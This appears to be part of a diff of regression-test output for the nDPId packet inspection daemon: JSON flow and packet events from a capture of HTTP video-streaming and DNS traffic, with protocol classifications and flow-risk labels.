00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":460,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1470104380300,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104380300,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0c30AAHAGQPfa9IeqwKhzCCOLwccogsRifLctf4ASQAAcSgAAAgQFtAEDAwABAQQC"}
01068{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":463,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104380188,"flow_last_seen":1470104380302,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104380302,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"218.244.135.170","src_port":49607,"dst_port":9099,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"218.244.135.170","url":"218.244.135.170:9099\/api\/qqlive_ckey\/get?vid=y0013xaeeyo&platform=10902","code":0,"content_type":"","user_agent":"Mozilla\/5.0"}}
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":397,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379903,"flow_last_seen":1470104379903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104379903,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49605,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":397,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1470104379903,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379903,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UgZAAIAG5uXAqHMIarkjbsHFAFDej0WbAAAAAIACIACnvwAAAgQE7AEDAwgBAQQC"}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":398,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1470104379903,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379903,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UgZAAIAG5uXAqHMIarkjbsHFAFDej0WbAAAAAIACIACnvwAAAgQE7AEDAwgBAQQC"}
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":399,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379916,"flow_last_seen":1470104379916,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104379916,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49606,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":399,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1470104379916,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379916,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UgdAAIAG5uTAqHMIarkjbsHGAFDBDvagAAAAAIACIAAUOgAAAgQE7AEDAwgBAQQC"}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":400,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1470104379916,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379916,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UgdAAIAG5uTAqHMIarkjbsHGAFDBDvagAAAAAIACIAAUOgAAAgQE7AEDAwgBAQQC"}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":401,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1470104379940,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379940,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGguxquSNuwKhzCABQwcUqRAQo3o9FnIASchAmawAAAgQFtAEBBAIBAwMH"}
00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":404,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379903,"flow_last_seen":1470104379941,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":336,"flow_tot_l4_payload_len":336,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1470104379941,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49605,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"jp.kankan.1kxun.mobi","url":"jp.kankan.1kxun.mobi\/api\/videos\/10410.json","code":0,"content_type":"","user_agent":""}}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":406,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1470104379954,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379954,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGguxquSNuwKhzCABQwcaIrnkOwQ72oYASchC\/lAAAAgQFtAEBBAIBAwMH"}
00806{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":409,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379916,"flow_last_seen":1470104379956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":357,"flow_tot_l4_payload_len":357,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1470104379956,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49606,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"jp.kankan.1kxun.mobi","url":"jp.kankan.1kxun.mobi\/api\/movies\/mp4script\/10410?definition=true","code":0,"content_type":"","user_agent":""}}
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":458,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104380188,"flow_last_seen":1470104380188,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104380188,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"218.244.135.170","src_port":49607,"dst_port":9099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":458,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1470104380188,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104380188,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UhRAAIAGEmDAqHMI2vSHqsHHI4t8ty1+AAAAAIACIAAqAAAAAgQE7AEDAwgBAQQC"}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":459,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1470104380188,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104380188,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UhRAAIAGEmDAqHMI2vSHqsHHI4t8ty1+AAAAAIACIAAqAAAAAgQE7AEDAwgBAQQC"}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":460,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1470104380300,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104380300,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0c30AAHAGQPfa9IeqwKhzCCOLwccogsRifLctf4ASQAAcSgAAAgQFtAEDAwABAQQC"}
01068{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":463,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104380188,"flow_last_seen":1470104380302,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104380302,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"218.244.135.170","src_port":49607,"dst_port":9099,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"218.244.135.170","url":"218.244.135.170:9099\/api\/qqlive_ckey\/get?vid=y0013xaeeyo&platform=10902","code":0,"content_type":"","user_agent":"Mozilla\/5.0"}}
00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":468,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1470104380603,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1470104380603,"pkt":"AQBef\/\/6zD2CHu7jCABFAAClQLUAAAQRv8HAqAUv7\/\/\/+utrB2wAkWQETS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1hbjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="}
00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":472,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104380737,"flow_last_seen":1470104380737,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1470104380737,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":54420,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":472,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1470104380737,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1470104380737,"pkt":"TF4M6gNlABxCjnAxCABFAAA9UhkAAIARpNbAqHMICAgICNSUADUAKZhJpTgBAAABAAAAAAAAAnZ2BXZpZGVvAnFxA2NvbQAAAQAB"}
@@ -174,18 +174,18 @@
00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":473,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1470104380737,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1470104380737,"pkt":"TF4M6gNlABxCjnAxCABFAAA9UhkAAIARpNbAqHMICAgICNSUADUAKZhJpTgBAAABAAAAAAAAAnZ2BXZpZGVvAnFxA2NvbQAAAQAB"}
00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":474,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1470104380772,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":116,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":116,"pkt_l4_len":82,"thread_ts_msec":1470104380772,"pkt":"ABxCjnAxTF4M6gNlCABFAABmlL4AAC4RtAgICAgIwKhzCAA11JQAUqbTpTiBgAABAAIAAAAAAnZ2BXZpZGVvAnFxA2NvbQAAAQABwAwABQABAAABKwANCnByb3h5LXNldDHAD8AtAAEAAQAAASsABMvNl+o="}
00772{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":474,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104380737,"flow_last_seen":1470104380772,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":74,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1470104380772,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":54420,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.QQ","breed":"Fun","category":"Chat"},"dns": {"query":"vv.video.qq.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"203.205.151.234"}}
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":475,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104380773,"flow_last_seen":1470104380773,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104380773,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.205.151.234","src_port":49608,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":475,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1470104380773,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104380773,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UhtAAIAGEUDAqHMIy82X6sHIAFAfZnbXAAAAAIACIABgGQAAAgQE7AEDAwgBAQQC"}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":476,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1470104380773,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104380773,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UhtAAIAGEUDAqHMIy82X6sHIAFAfZnbXAAAAAIACIABgGQAAAgQE7AEDAwgBAQQC"}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":477,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1470104380801,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104380801,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADMGsFvLzZfqwKhzCABQwcglYwNrH2Z22IASFoBABAAAAgQFoAEBBAIBAwMK"}
00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":480,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104380773,"flow_last_seen":1470104380807,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":204,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1470104380807,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.205.151.234","src_port":49608,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"},"http": {"hostname":"vv.video.qq.com","url":"vv.video.qq.com\/getvinfo","code":0,"content_type":"","user_agent":"Mozilla\/5.0"}}
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":487,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104380890,"flow_last_seen":1470104380890,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104380890,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"42.120.51.152","src_port":49609,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":487,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1470104380890,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104380890,"pkt":"TF4M6gNlABxCjnAxCABFAAA0Uh9AAIAGFuTAqHMIKngzmMHJH5CKzmkHAAAAAIACIADo5wAAAgQE7AEDAwgBAQQC"}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":488,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1470104380890,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104380890,"pkt":"TF4M6gNlABxCjnAxCABFAAA0Uh9AAIAGFuTAqHMIKngzmMHJH5CKzmkHAAAAAIACIADo5wAAAgQE7AEDAwgBAQQC"}
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":475,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104380773,"flow_last_seen":1470104380773,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104380773,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.205.151.234","src_port":49608,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":475,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1470104380773,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104380773,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UhtAAIAGEUDAqHMIy82X6sHIAFAfZnbXAAAAAIACIABgGQAAAgQE7AEDAwgBAQQC"}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":476,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1470104380773,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104380773,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UhtAAIAGEUDAqHMIy82X6sHIAFAfZnbXAAAAAIACIABgGQAAAgQE7AEDAwgBAQQC"}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":477,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1470104380801,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104380801,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADMGsFvLzZfqwKhzCABQwcglYwNrH2Z22IASFoBABAAAAgQFoAEBBAIBAwMK"}
00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":480,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104380773,"flow_last_seen":1470104380807,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":204,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1470104380807,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.205.151.234","src_port":49608,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"},"http": {"hostname":"vv.video.qq.com","url":"vv.video.qq.com\/getvinfo","code":0,"content_type":"","user_agent":"Mozilla\/5.0"}}
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":487,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104380890,"flow_last_seen":1470104380890,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104380890,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"42.120.51.152","src_port":49609,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":487,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1470104380890,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104380890,"pkt":"TF4M6gNlABxCjnAxCABFAAA0Uh9AAIAGFuTAqHMIKngzmMHJH5CKzmkHAAAAAIACIADo5wAAAgQE7AEDAwgBAQQC"}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":488,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1470104380890,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104380890,"pkt":"TF4M6gNlABxCjnAxCABFAAA0Uh9AAIAGFuTAqHMIKngzmMHJH5CKzmkHAAAAAIACIADo5wAAAgQE7AEDAwgBAQQC"}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":489,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104380909,"flow_last_seen":1470104380909,"flow_idle_time":180000,"flow_min_l4_payload_len":317,"flow_max_l4_payload_len":317,"flow_tot_l4_payload_len":317,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1470104380909,"l3_proto":"ip4","src_ip":"192.168.10.110","dst_ip":"255.255.255.255","src_port":60480,"dst_port":62976,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00876{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":489,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1470104380909,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":359,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":359,"pkt_l4_len":325,"thread_ts_msec":1470104380909,"pkt":"\/\/\/\/\/\/\/\/XNmY3fXzCABFAAFZAABAAEARbn7AqApu\/\/\/\/\/+xA9gABRTgx\/\/8AAKAAXNmY3fXzwKgKbgAAAgAnAUROUy0xMTAwLTA0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABOQVMAAAAAAAAAAAAAVVqvihgAAABVWsE9WwAAAFVasDEuMDJiMTAAEXgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAXNmY3fXzM0ExAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGRsaW5rLURERjVGMwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAqApu\/\/8AAExBTjEAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":492,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1470104380966,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1470104380966,"pkt":"ABxCjnAxTF4M6gNlCABFAAAwAABAADAGuQcqeDOYwKhzCB+QwcnDIL+ais5pCHASFtCCkgAAAgQFtAEBBAI="}
01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":495,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104380890,"flow_last_seen":1470104380968,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":252,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1470104380968,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"42.120.51.152","src_port":49609,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"42.120.51.152","url":"42.120.51.152:8080\/api\/proxy?url=http%3A%2F%2Fvv.video.qq.com%2Fgetvinfo","code":0,"content_type":"","user_agent":"Mozilla\/5.0"}}
